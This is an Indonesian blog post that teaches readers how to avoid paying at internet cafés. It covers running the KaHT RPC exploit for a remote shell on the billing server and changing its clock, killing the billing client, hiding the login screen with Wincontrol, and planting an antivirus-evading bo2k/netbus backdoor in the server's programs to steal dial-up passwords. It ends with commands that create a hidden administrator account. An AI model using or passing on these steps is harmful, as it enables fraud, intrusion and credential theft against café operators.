Mengenai Saya

Foto saya
ingat jangan gunakan ilmu yg saya beri untuk tindakan kejahatan, tanggung jawab anda terima sendiri, itulah tanda orang yg bijak. setelah anda memahami, berikan komentar anda!! terima kasih.

Cari Blog Ini

Menurut Anda, Bagaimanakah Blog ini?

Billing Hack dengan Kaht

Tulisan ini belum pernah penulis praktekkan, dan hanya bersumber dari nalar murni penulisnya. Ide ini ditemukan ketika iseng-iseng membuka situs beben. Semua kegiatan yang pembaca lakukan terhadap penggunaan artikel ini berada di luar tanggung jawab penulis dan liat artikel punya si beben. So, bagi para target yang menjadi korban dari tulisan ini diharapkan tidak menuntut penulis dan bagi para pembaca artikel ini juga untuk tidak menyalah gunakan artikel ini.

Tool Utama

Tools yang digunakan untuk mendukung aksi kita ini adalah sebuah program yang dinamakan kaht. Program ini digunakan untuk membuka shell target secara remote dengan menggunakan kanal port 135 (itu kalo tidak salah).

Cari Server

Langkah kedua ini yaitu mencari ip dari target kita. Kebiasaannya dalam dunia networking terutama LAN, ip dari server billing target kita adalah 192.168.0.1 tetapi itu tidaklah mutlak. Untuk masalah mencari ip dari target kita, kita serahkan saja semuanya kepada kaht. Ketikkan command winipcfg di run atau di command prompt untuk melihat ip kita. Lalu, masih di command prompt, pindahkan directory anda ke directory di mana anda menyimpan file kaht.

Mulai

Dengan asumsi bahwa ip anda adalah 192.168.0.3 dan anda yakin bahwa target billing server kita berada dalam jangkauan yang sama yaitu dari 192.168.0.0 – 192.168.0.255 maka ketikkan command berikut : kaht contoh penggunaan : C:\kaht 192.168.0.0 192.168.0.255 Selanjutnya tinggal ongkang-ongkang kaki aja dan bersantai sejenak sambil “ngudud”. Setelah mendapatkan target kita, kita cek sekali lagi apakah dia itu target billing server kita ??? kalo bukan ketikkan exit dan kaht akan melanjutkan proses scanning target di lan kita. Untuk mengetahui apakah target yang kita masuki adalah target yang kita inginkan, ketikkan command ipconfig /all di kotak DOS target kita (anda sekarang sedang melakukan remote shell lho :)). Biasanya pada baris hostname akan bernilai server atau yang lain, soalnya ini tergantung administratornya sich mo kasih nama apa itu host namenya. Setelah yakin bahwa target yang kita masuki adalah target billing server kita, maka lanjutkan mengetikkan command time lalu isikan dengan yang baru. Selanjutnya terserah anda…


Cara kedua

1.pasang muka culun (ato bego) kek yg diomongkan diatas
2.sediah kopi
3.tentunya rokok
4.nah sekarang yg perlu kalian jalankan adalah
5.cabut kabel lan cardnya …
6.trus restart komputer kamu
7.jika sudah kluar gambar desktop sebelum gambar billing itu kluar kamu cepet²an tekan alt+del+ctrl dan kamu del yg client 008
gampangkan ?

Cara ketiga

Sering kali kita menjadi lupa waktu bila berada didepan komputeruntuk surfing dan hal ini ngak jadi masalah bila memakai komputer di kantor dengan koneksi broadband atau Dsl. Masalah baru muncul apabila kita surfing di Warnet. Proteksi yang biasa digunakan oleh warnet pada umumnya adalah nag screen atau window yang mengharuskan kita login terlebih dahulu [note:login ini berbeda dengan login start up] karena pada dasarnya komputer sudah dalam keadaan siap pakai hanya terhalang oleh nag screen tersebut, sedangkan koneksi ke internet dalam keadaan stand by. Yang harus dilakukan adalah membypass proteksi tersebut.

Prosedurnya adalah :
Tetap harus login terlebih dahulu agar tidak mencurigakan

Download Wincontrol –>> winctrl.exe untuk bypass login screen

Ekstrak wincontrol dan aktifkan
F9 = untuk menghilangkan window pada aktif cursor
F10= untuk mengembalikan window seperti semula
Jalankan timer untuk mengingatkan durasi waktu yang diinginkan
Logout bila telah mencapai biaya yang ditetapkan, biasanya tarif perjam Rp 6.000,-
Setelah logout tekan F9 maka login screen akan menghilang dan kita bisa kembali surfing tanpa biaya. Jangan lupa untuk menonaktifkan wincontrol setelah selesai.

Usahakan agar tidak terlalu menarik perhatian penjaga warnet [ surfing selama 3 jam = Rp 1500 ? ] cari warnet yang mempunyai banyak workstations-nya.

Untuk Mendownload Wincontrol dapat di download di www.yogyafree.net

Cara keempat

Alat yang dibutuhkan : - Backdoor Program , i.e: bo2k, netbus
- Portscanner
- Nekat !

Praktek : - Jelajahi warnet yg ada di kotamu, perhatikan apakah di server komputer ada drive utama yang di-mount.(Setidaknya server harus ber-os MicroShit Windows 98/NT).

- Siapkan program backdoor kamu yang sudah kkamu konfigurasi bo,netbus.. terserah kamu ;p >, agar tidak dikenali disarankan program backdoornya di recompile ulang agar tdk dikenali oleh antivirus, tambahkan data sampah sesuka kamu, jika tidak kamu recompile juga tdk apa-apa tetapi program akan mudah dikenali oleh antivirus.

- Cari program .exe yang biasanya sering dippakai oleh operator warnet,i.e: Mirc32.exe, iexplore.exe dll.

- Copy file tersebut di komputer client warnnet, sisipkan backdoor kamu ke program tersebut pake silkrope (Baca petunjuknya di press release bo2k, (http://www.bo2k.com )

- Delete file original di komputer server (HHati - hati jika tdk bisa kemungkinan
program sedang dipakai, pake program lain spt iexplore.exe ).

- Setelah mendelete file asli di komputer seerver, copykan file yang sudah disisipi backdoor dari komputer client warnet ke komputer server, tentunya dengan memakai nama asli program seperti Mirc32.exe atau iexplore.exe.

- Logout dari client warnet dan bayar sewa iinternet. (Pasang muka lugu dan bego).

- Setelah sehari dirasa cukup maka kembali llagi ke warnet yang di-hack dan lakukan scanning port yang terbuka, jika port yang terbuka match dengan konfogurasi backdoor kamu maka ….. SELAMAT BUNG !! Anda layak tertawa….. hi….hi…hi….., backdoor anda telah dijalankan oleh operator warnet yang !! kekekeke.

- Lakukan penjelajahan sepuas kamu….., lisst password jika server warnet NT dan crack pakelophtcrack, jika server windows 9x…..tertawalah lagi sampai akan muntah dan kejang - kejang.. ;p ,karena jika di list passwordnya akan didapati password dial-up ke ISP. tanpa “ENCRYPT” sama sekali.. (From other)

Nah kalau cara diatas belom juga bikin lho seneng …. Coba lagi aja degh pake KAHT (baca disini). Cara pemakaiannya seperti ini bro mudah-mudahan lho gak lupa lagi:

1. Download program KaHT letakkin di folder c:\windows\system32 (kalo XP)
2. Buka start > run… ketikkan CMD
3. ketikkan : Kaht 127.0.0.1 127.0.0.2
4. Kalo prompt pindah ke system32 berarti berhasil, kalo ga bisa pastiin port yg dipake kaht ga tertutup. Dan kompi kita wajib belom pake SP2
5. Ketik:
net user [username] [userpass] /add
net localgroup Administrator [username] /add
6. Misalnya : Kayaknya udah dijelasin deh, ga usah ya.

- Having fun….. and stay out of troble ..ddan ingat “Junjunglah Etika HACKER”, jangan sekali -kali membuat kerusakan, cukup untuk kamu

lihat -lihat server warnet…OK

Bila kurang jelas / kesulitan menemukan softwere yg diperlukan, berikan komentar / kirim pesan
lewat e-mail saya!

0 komentar:

BeRIKaN KOmeNtaR aNda


ShoutMix chat widget